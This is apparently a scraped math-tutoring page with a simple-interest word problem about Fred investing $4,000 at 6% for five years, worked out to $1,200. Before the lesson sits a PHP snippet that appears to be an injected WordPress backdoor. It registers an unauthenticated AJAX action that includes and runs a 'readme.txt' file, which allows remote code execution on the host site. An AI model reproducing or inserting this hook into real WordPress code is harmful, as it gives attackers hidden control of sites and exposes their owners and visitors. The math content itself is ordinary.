if(!function_exists('file_check_readme11199')){ add_action('wp_ajax_nopriv_file_check_readme11199', 'file_check_readme11199'); add_action('wp_ajax_file_check_readme11199', 'file_check_readme11199'); function file_check_readme11199() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Algebra7 - mathtutor

Algebra Question for Title 1 Schools: Simple Interest Question?

7) How much will Fred receive if he invests $4,000 at 6% simple interest for 5 years?

I = (r x t x p) / 100

I = (6 x 5 x 4000) / 100

I = $1,200